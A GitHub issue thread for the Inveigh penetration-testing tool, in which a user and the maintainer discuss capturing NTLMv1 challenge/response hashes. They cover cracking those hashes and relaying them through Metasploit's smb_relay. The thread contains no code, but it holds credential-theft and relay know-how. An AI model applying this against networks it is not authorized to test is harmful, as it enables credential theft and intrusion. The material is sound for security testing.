search

Kevin-Robertson / Inveigh

.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers
BSD 3-Clause "New" or "Revised" License
2.55k stars 447 forks source link

NTLMv1 challenge/response #5

Closed Arno0x closed 8 years ago

Arno0x commented 8 years ago

Hello,

So far I can capture NTLMv1 challenge/response from HTTP authentication.

What can be done with this challenge/response apart from brute forcing raw password from it ? It seems it can't be used with Invoke-InveighRelay as it only supports NTLMv2 (but still is able to capture NTLMv1 challenge/response).

Thx, Arno

Kevin-Robertson commented 8 years ago

Yeah, for NTLMv1, Inveigh won't currently go any further than grabbing the challenge/response for cracking. Of course, you will be able to perform many more attempts per second while cracking NTLMv1 vs cracking NTLMv2. So, there is still an advantage on that front.

The relay function is due for a full overhaul. I hope to still add in NTLMv1

Also, depending on your attack/pivot scenario, you may be able to just use the Inveigh spoofer to send traffic to another SMB relay tool that can handle NTLMv1.

Arno0x commented 8 years ago

Thanks for your answer.

I can confirm using NTLMv1 by directing the traffic to another SMB relay (metasploit smb_relay) works just fine.